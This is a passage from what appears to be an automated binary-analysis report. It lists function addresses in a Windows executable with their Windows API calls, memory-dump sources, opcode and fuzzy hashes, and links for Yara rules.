                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Heap$Alloc$AllocateFreeVirtual
                                      • String ID:
                                      • API String ID: 1005975451-0
                                      • Opcode ID: a1e53f7c4627e64d4cab0a5f12f4ae7980d316a91c477806b3385b41e0cd262a
                                      • Instruction ID: 8f2e2a46fff020ceebcd77996ad294a1df47d54e69d793dca874ce5180fa1092
                                      • Opcode Fuzzy Hash: a1e53f7c4627e64d4cab0a5f12f4ae7980d316a91c477806b3385b41e0cd262a
                                      • Instruction Fuzzy Hash: 51113A31200340EFC7308F19ED85A627BB6FB89751B50492AF15AC6AF5C3F198C6CB18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00459A78, Relevance: 4.7, APIs: 3, Instructions: 163memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(?,00000008,00001048), ref: 00459A9D
                                      • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 00459B38
                                      • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 00459B4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                      • Instruction ID: 1485277bc71d42c7a2e462d699ac850e19a31b53f22b8dbfa60e2f7fcb85d0e5
                                      • Opcode Fuzzy Hash: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                      • Instruction Fuzzy Hash: B551E9B5A00109EFDB04DF98C981EAEB7B5FF88300F108159F915AB341D635AE55CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D6CA, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0044A2D3,00000000,00000000,00000000,00000000,?,00000000,?,004436DC,00000000,00000000,00000000,00000000,004368AB), ref: 0044D6D3
                                      • SetErrorMode.KERNELBASE(00000000,?,00000000,?,004436DC,00000000,00000000,00000000,00000000,004368AB,00000000), ref: 0044D6DA
                                        • Part of subcall function 0044D72D: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044D75E
                                        • Part of subcall function 0044D72D: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044D7FF
                                        • Part of subcall function 0044D72D: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044D82C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 3389432936-0
                                      • Opcode ID: 43d3a8b0a8eb7613163596dbe267daaa4045f83054bdb6cc33622f808e71fb80
                                      • Instruction ID: 08018a144fd71b122f53f93859323684dea7b69782bdb41910a173adbe26382b
                                      • Opcode Fuzzy Hash: 43d3a8b0a8eb7613163596dbe267daaa4045f83054bdb6cc33622f808e71fb80
                                      • Instruction Fuzzy Hash: E0F03CB49052104FE754AF65D484B097BE4AF44714F06849FF4449B3A2CB78D840CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448814, Relevance: 3.0, APIs: 2, Instructions: 27threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CurrentHookThreadWindows
                                      • String ID:
                                      • API String ID: 1904029216-0
                                      • Opcode ID: d1946b4b5f0bb4dac5015d24637ae73f29ef06285a2f11d8d1c4ed78f88735c7
                                      • Instruction ID: 6434d997b0ca645eb757e57b22b608c173830560ff11fe72d352ce575c6ac3eb
                                      • Opcode Fuzzy Hash: d1946b4b5f0bb4dac5015d24637ae73f29ef06285a2f11d8d1c4ed78f88735c7
                                      • Instruction Fuzzy Hash: 8BF0A7319016506FF7603BB26C4EB5A39609B05319F4A476FB1026B1E2CF2C9C41875D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043900C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00436829,00000001), ref: 0043901D
                                        • Part of subcall function 00439048: HeapAlloc.KERNEL32(00000000,00000140,00439031), ref: 00439055
                                      • HeapDestroy.KERNEL32 ref: 0043903B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Heap$AllocCreateDestroy
                                      • String ID:
                                      • API String ID: 2236781399-0
                                      • Opcode ID: ed9c888bb612b73e073b43d255091410b4b2958213777411d3e3523189053186
                                      • Instruction ID: 75467280b13c405997843fcdb9d00a0c8a966375f0174e6eea3db59680342214
                                      • Opcode Fuzzy Hash: ed9c888bb612b73e073b43d255091410b4b2958213777411d3e3523189053186
                                      • Instruction Fuzzy Hash: 48E05B716143005FEB241B31AD4576636E5DB5C783F104476B904C41F6EBF8CCC09E08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00439796, Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,004394BC,000000E0,00000000,?,?,?,0043683B), ref: 004397E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: cfb3c694cca046faafdba626416f576a4e966fba747c95529c6df6e76ea207dd
                                      • Instruction ID: ddab8c0de8b454498bcbd443a27c592ae9c6af54464b130e9ee3fff07dff6107
                                      • Opcode Fuzzy Hash: cfb3c694cca046faafdba626416f576a4e966fba747c95529c6df6e76ea207dd
                                      • Instruction Fuzzy Hash: A6319C716006069FD314CF18C484BA5BBE4FB94364F24C2BED15A8B3E2D7B4D906CB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043CC20, Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapAlloc.KERNEL32(00000008,?,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 0043CC75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: d84fbaf4d9db0fde22ea67c64c54a2b9b7244b0bc250dac9cc500a4cfd7363fd
                                      • Instruction ID: a2d638b41c73fe25d314f60e6d3419ee44180230b70d95c8f78c3885eb5d0c7a
                                      • Opcode Fuzzy Hash: d84fbaf4d9db0fde22ea67c64c54a2b9b7244b0bc250dac9cc500a4cfd7363fd
                                      • Instruction Fuzzy Hash: 4C0168365017102AE621222A6DC1B5B62059B8C7B5F193127FD5D773D2DA6C8C41439D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00441490, Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 004414D5
                                      • CallWindowProcA.USER32 ref: 004414F7
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID: #32770
                                      • API String ID: 2276450057-463685578
                                      • Opcode ID: 596bb558e865478f89c805c3f39751e40d7ca6def2da487f474ae61eff310b4b
                                      • Instruction ID: 5e5ac69cd16c431473ba198cff910c95c7e092372b87668bf0dfd73680f8d94b
                                      • Opcode Fuzzy Hash: 596bb558e865478f89c805c3f39751e40d7ca6def2da487f474ae61eff310b4b
                                      • Instruction Fuzzy Hash: B381083660130477F620AB11DC45FEF776CEB863A6F000427FA0683262D72DE99586BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043ED67, Relevance: 26.7, Strings: 21, Instructions: 417COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                      • API String ID: 0-1157002505
                                      • Opcode ID: bd92f769701acbabcda757e67f8c84c0c29cef7b7df9b59f2df65afb2bd5e7df
                                      • Instruction ID: 6e2cd87681fd11b95aa59c96bf0e514dab5f7b1500e008d072f0b4967df15fe4
                                      • Opcode Fuzzy Hash: bd92f769701acbabcda757e67f8c84c0c29cef7b7df9b59f2df65afb2bd5e7df
                                      • Instruction Fuzzy Hash: B5E1F631D5620ADEEF298F5AC4457FE7BB1AB0C304F246027E411A62C2D7BD8D86CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00436310, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 234timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 0043637B
                                      • GetDriveTypeA.KERNEL32(00000000), ref: 004363D7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00436445
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043645B
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004364B1
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004364C7
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0043651F
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00436535
                                      • FindClose.KERNEL32(?), ref: 0043656C
                                      • GetLastError.KERNEL32 ref: 004365AE
                                      • FindClose.KERNEL32(?), ref: 004365BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                      • String ID: ./\
                                      • API String ID: 816071114-3176372042
                                      • Opcode ID: 85dda5fa7655cb79b2db567d9f90a52d131cb0fa20e551a420700b2d3b4c7aac
                                      • Instruction ID: 16edfbd5c2c47281b64e8a19442489466bf5a4e536016fba3494bf0c05afe862
                                      • Opcode Fuzzy Hash: 85dda5fa7655cb79b2db567d9f90a52d131cb0fa20e551a420700b2d3b4c7aac
                                      • Instruction Fuzzy Hash: 5F818FB1840219BECB20DFA5DC04AAFB7F8AF0C315F0094ABF555E6251E738DA44CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440CE0, Relevance: 19.7, APIs: 13, Instructions: 220windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CallWindowProcA.USER32 ref: 00440D1A
                                      • DefWindowProcA.USER32(00000000,?,?,?), ref: 00440D2D
                                      • IsIconic.USER32(00000000), ref: 00440D4F
                                      • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 00440D7C
                                      • GetWindowLongA.USER32 ref: 00440D8B
                                      • GetWindowDC.USER32(00000000), ref: 00440DCC
                                      • GetWindowRect.USER32 ref: 00440DDA
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00440E1D
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00440E40
                                      • SelectObject.GDI32(00000000,00000000), ref: 00440E4E
                                      • OffsetRect.USER32(?,?,00000000), ref: 00440EA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
                                      • String ID:
                                      • API String ID: 2215177122-0
                                      • Opcode ID: 32e174de3d94b8017e313b7cafda405eb6513b402cdbba80a2c3ec7db4591613
                                      • Instruction ID: 9f7d3192de9f4fd847b4db668f76f1e974e6555d221dedb860730df8ee33fd10
                                      • Opcode Fuzzy Hash: 32e174de3d94b8017e313b7cafda405eb6513b402cdbba80a2c3ec7db4591613
                                      • Instruction Fuzzy Hash: BE815871508301AFD300DF68DC85E6BB7E4FB89319F044A2EF989872A1D775EA05CB66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043E8B9, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,0043BA5D,?,Microsoft Visual C++ Runtime Library,00012010,?,00461440,?,00461490,?,?,?,Runtime Error!Program: ), ref: 0043E8CB
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0043E8E3
                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0043E8F4
                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0043E901
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                      • API String ID: 2238633743-4044615076
                                      • Opcode ID: 5fefb38458db5f044049b701284ee05f5d68dca90c23af830288f4c03ca47f9e
                                      • Instruction ID: 30c8665ccc2e40d9467df029bce41031994b6616794be17e79eec1558e76a480
                                      • Opcode Fuzzy Hash: 5fefb38458db5f044049b701284ee05f5d68dca90c23af830288f4c03ca47f9e
                                      • Instruction Fuzzy Hash: 0D01D875301341AF8B50AFBADC80B5B3AE89E5C781B09143BF109D2272D778C8459B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443530, Relevance: 12.2, APIs: 8, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceA.KERNEL32(?,?,00000002), ref: 00443543
                                      • SizeofResource.KERNEL32(?,00000000,?,76922D10,00000000,769217C0,?,?,?,?,?,?,?,?,00441181,00000001), ref: 0044355D
                                      • LoadResource.KERNEL32(?,00000000,?,76922D10,00000000,769217C0,?,?,?,?,?,?,?,?,00441181,00000001), ref: 00443567
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Resource$FindLoadSizeof
                                      • String ID:
                                      • API String ID: 507330600-0
                                      • Opcode ID: 7e5b313211204ffa4e332eb726cc08490a13e872b21fef04d21c9d65485d2146
                                      • Instruction ID: 1917320e325defd3a61241e9dbda23396abca62690361eb653e02e1e1d4cba8c
                                      • Opcode Fuzzy Hash: 7e5b313211204ffa4e332eb726cc08490a13e872b21fef04d21c9d65485d2146
                                      • Instruction Fuzzy Hash: 0241CD326047155BE70CCE29985AAAF77D2EBC9251F048A3EFA46C3391CB71D909C2A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448223, Relevance: 12.1, APIs: 8, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00448260
                                      • LoadResource.KERNEL32(?,00000000), ref: 00448268
                                        • Part of subcall function 00444E40: UnhookWindowsHookEx.USER32(?), ref: 00444E65
                                      • LockResource.KERNEL32(?), ref: 00448275
                                      • IsWindowEnabled.USER32(?), ref: 004482A8
                                      • EnableWindow.USER32(?,00000000), ref: 004482B6
                                      • EnableWindow.USER32(?,00000001), ref: 00448344
                                      • GetActiveWindow.USER32 ref: 0044834F
                                      • SetActiveWindow.USER32(?), ref: 0044835D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Resource$ActiveEnable$EnabledFindHookLoadLockUnhookWindows
                                      • String ID:
                                      • API String ID: 4081536698-0
                                      • Opcode ID: 259f7cae2ea04aba6dd8bb5c14475dd7a30ddecdf17f1a89bf407545324321d2
                                      • Instruction ID: 40a5a33dd64d3191a8bb28d34adccfd1df6f60c33436460b911c2a3c0f0c6a41
                                      • Opcode Fuzzy Hash: 259f7cae2ea04aba6dd8bb5c14475dd7a30ddecdf17f1a89bf407545324321d2
                                      • Instruction Fuzzy Hash: 97418070900B049FEB21AF65C84ABBFB7B5BF44B15F14051FE502A22A1CF799E01CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449B06, Relevance: 10.6, APIs: 7, Instructions: 72stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00449B29
                                      • lstrcpynA.KERNEL32(?,?,00000104), ref: 00449B38
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00449B6C
                                      • CharUpperA.USER32(?), ref: 00449B7D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00449B93
                                      • FindClose.KERNEL32(00000000), ref: 00449B9F
                                      • lstrcpyA.KERNEL32(?,?), ref: 00449BAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Find$CharCloseFileFirstFullInformationNamePathUpperVolumelstrcpylstrcpyn
                                      • String ID:
                                      • API String ID: 403452862-0
                                      • Opcode ID: fdffec50d54b9f98fd4023632cd798f63d9708f17defb34e266e528e058c5156
                                      • Instruction ID: df522f99a8fbe858ad1d724cfd319ddb3506c91dc17946f1ea3aa9e0e94fa69f
                                      • Opcode Fuzzy Hash: fdffec50d54b9f98fd4023632cd798f63d9708f17defb34e266e528e058c5156
                                      • Instruction Fuzzy Hash: 78219A71900118BBDB109FA1EC48EEF7FBCEF09361F008166F919E21A1D7349A41DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042D406, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
